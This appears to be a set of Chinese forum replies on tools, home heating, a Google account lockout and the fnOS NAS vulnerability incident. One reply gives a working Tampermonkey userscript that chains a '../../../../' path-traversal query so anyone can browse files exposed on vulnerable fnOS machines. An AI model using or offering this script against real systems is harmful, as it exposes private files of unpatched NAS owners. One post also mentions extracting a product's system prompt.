另外这个产品的付费模式，从现有的情况来看是有些畸形的，说的就是国内那家动不动加微信做推广的。订阅服务死贵也就算了，产品出来就没怎么升级过，figma 一堆新特性不跟进，完全躺平等死。

这个功能的重度用户，主要用于：
1. AI 快速生成的一些小 DEMO 是 html 的单文件，往往需要将这个 html code 导入到 figma 来做修改或提取素材；
2. 已经在线上的站点，偶尔需要修改示意或做局部调整，很早之前只能截图然后改位图；
3. 看到好的设计或者浏览的站点，迫切希望记录这个灵感，通过 figma 可以很好的记录和为以后重用、修改做准备；

因为此类需求被挖掘的起始差不多了，我自己甚至也 vibe coding 了一个自用的，但还是想说一些很迫切但很少人关注到的功能：
1. 局部提取，非常重要，通过浏览器插件来快速选择一个区域，只导入这一小块区域。原因是如果直接导入整个页面，一些复杂交互是有分镜的，需要交互后才会出现，例如一些右键菜单、打开的快捷 pannel 等。
2. ViewPort 设置，非常重要，很多时候导入的设计是没办法完美做到自动布局的，宽度和高度会影响未来的使用效率；
3. 自动布局兼容性，这个连官方 make 做的那个导入都不完美，flex 和 grid 布局仍然有很多地方无法自动适配宽高；
4. 图层命名，很少人关注的点，如果没处理好就是一大堆的 div ，我自己用了个小模型来自动命名；
5. 图片、icon 的导入处理，很麻烦，且各种异常太多，需要一点点的微调和排查 bug 。这里包含图片的设置方式，背景图片的处理机制，icon 、svg 转化或字体 icon 的特殊处理；
6. 自动组件化，复用区域的自动化组件生成和适配，这个我在尝试，但始终没有一个特别好的方案，目前用小模型分析做了一版自用的；

有几个也想要，但还没思路的功能：
1. 官方 make 给的积分只有每个月 4000 多了，完全不够用。我获取了他的 system prompt 用 claude code 来复现效果很好，甚至一些国产模型也不错。所以希望能有个本地服务快速和 figma 设计同步的工具来实现，这里起始没有太多难点，就是工程上要考虑便捷性；
2. 记录来源，能够和浏览器插件同步，有时候不太像重新粘贴；
3. 基于 mcp 服务来把 AI 和 figma 的互通，引入这个 html 转 figma 的能力；

我本身是个产品经理，所以工程能力一般，如果你有需要我可以提供更多的想法，把这个产品搞舒服一些。

Camtasia
提供了一个快捷选项，在录制时自动隐藏桌面图标。付费的，不过作为生产力工具，这个应该是我花的很值的一笔投入，几乎满足所有关于录屏和剪辑、导出的需求

早早已经把这类需求挖掘到极致了，一个小程序解决所有问题，各种查询筛选条件，几乎实时的比价和积分价排序，回血值都能帮你计算好~
更重要的是有条件订阅，价格变化后订阅变更这个太重要了

早早积分房助手——貌似是我自己常用的微信小程序排前三的高频应用

如果能够 30 小时持续录音还是有竞争力的，但感觉价格还是太高了

dWNhaXdAaG90bWFpbC5jb20=

我最近在用这个（ https://github.com/never13254/GhostType ），一起来维护个好的开源版？

https://www.bilibili.com/video/BV1QbFszzErp/

该漏洞居然 0.8.16 版本就存在了，2024 年 9 月 5 日

@eber 应该是没仔细看这次的事件吧。即使没有映射和开放任何端口到外网，也没有通过自建的穿透到公网服务器，仍然可能会受到影响，这是 FNC 服务的设计导致的，通过遍历扫描几乎可以连接到所有开启了这个服务的机器，样本统计下来，FNC 开启率还是非常非常高的，平均下来也在 80%以上。这个是飞牛系统除硬件收入、企业订阅外的很大的商业收入来源，而且提供了免费慷慨的接入服务。

如果开启这个服务也会导致所有数据全部泄露，那我感觉不太能因为这个行为怪用户~

本质上是这个漏洞太低级了，低级到近 20 年我作为半个网安圈的人都没怎么遇到过知名系统犯过这个错误

@qianlongzt 所以一直到现在，还有非常多仍然受到影响的。有意思的是可以看到飞牛自带 nginx 的日志，找了几个分析了下，早就被轮了无数遍了。

https://imgur.com/a/ObaURjs

@coolair 这并不能避免影响。现在的这俩漏洞不只是可以看到和拿到你的文件，还可以肆意乱搞，当成肉鸡或者挖矿都是小事，还可以开内网的洞，影响面可就不是这一台机器这么简单了。

这个简单的油猴脚本就可以正常浏览用户泄露文件了

```Javascript
// ==UserScript==
// @name 路径遍历链接修复工具
// @namespace http://tampermonkey.net/
// @version 1.0
// @description 修复特定路径下的 LFI/目录遍历链接拼接问题
// @author xxx
// @match *://*/app-center-static/serviceicon/myapp/%7B0%7D/*
// @grant none
// ==/UserScript==

(function() {
'use strict';

// 获取当前页面的查询参数，即 ?size=../../../../ 部分
const currentSearch = window.location.search;
// 获取当前页面的基础路径，即 /app-center-static/serviceicon/myapp/%7B0%7D/
const currentPath = window.location.pathname;

// 选取所有的 <a> 标签
const links = document.querySelectorAll('a');

links.forEach(link => {
// 获取 HTML 中原本的 href 属性值（例如 "vol1/" 或 "bin"），而非浏览器解析后的完整 URL
const rawHref = link.getAttribute('href');

if (rawHref) {
// 核心逻辑：基础路径 + 原有查询参数 + 目标文件路径
// 结果：.../myapp/%7B0%7D/?size=../../../../vol1/
const newUrl = currentPath + currentSearch + rawHref;

// 修改链接的指向
link.href = newUrl;
}
});

console.log(`已修正 ${links.length} 个路径遍历链接。`);
})();
```

《异物志》

著名闭源翻译插件是哪个

@EmpCold 一楼、有热交换新风，锅炉用的欧标冷凝炉，装修时特别盯了下保温层施工，应该就这些因素

@ucaime 另外补充一个，持续运行后不像第一次开机，第一次开机或者冷启动耗气极高，热效率有个曲线，你可以打开你的锅炉说明书研究一下

燃气地暖，冷凝炉，将房间温控面板温度设置到 26-28 （相当于常开，完全不用温控，仅在外环境温度特别高时作为熔断措施）。根据环境温度调控冷凝炉水温（变动并不大）。120 平，室内温度 24 基本稳定，月燃气费（混合生活用水燃气费用）平均 600-900 （ 900 是每年最冷的月份）。

以上是目前摸索下来最舒适和节能的方案。

6 年前刚安装时依赖面板温控，两个问题比较严重

1. 室温浮动大：水地暖升温降温慢，面板开关阈值一般 1°，导致实际感受温差会超过 3-5 ；
2. 冷凝炉频繁启动关闭导致节能效果不佳且维护保养要跟上，不然分分钟停机或出问题；

另外还有一些其他信息可以参考
1. 分区温控有时候还是要搞，但最好能确保持续运行而不是停停转转，例如工作间因为散热设备多，面板设置 20 足够，且工作时需要冷静不想太热。
2. 维护保养很重要，管道定期脉冲清洗，冷凝炉保养。
3. 冷凝炉娇贵但却是节能，用的多还可以。

基于 6 年前经验，现在应该有更好的做法或者设备已经迭代很好了，所以仅供参考

最近也经历了一次，偶然通过绑定的某个备用 Android 手机搞回来了。
原因：找回后在谷歌的活动日志中检查了所有可能的原因，最后猜测为因 DLER 的订阅地址调整，更换了自己的规则库，导致多个设备的 google 流量出口不再一致，同时可以确认某个出口节点是个垃圾出口，叠加两个因素后进入风控状态。提示因多次尝试需要等待几个小时，但实际上几天都不行。
直到某天，备用 Android 机偶尔开机取个东西，gmail 跳出了需要重新登陆谷歌账号的提示，这台机器的 Google Play 也提示需要重新登陆，遂正常操作登陆。然后全平台解除了风控，账号恢复正常。除了这台机器，任何一个设备、任何浏览器，哪怕指纹浏览器都不允许登陆。

试过好几个类似的服务了

@ucaime GEN8 不是 1265 ，是 1260 ，前段时间装了飞牛体验了一下，还不错，就是有些机制不如群晖舒服，模仿的痕迹过于明显，但体验很好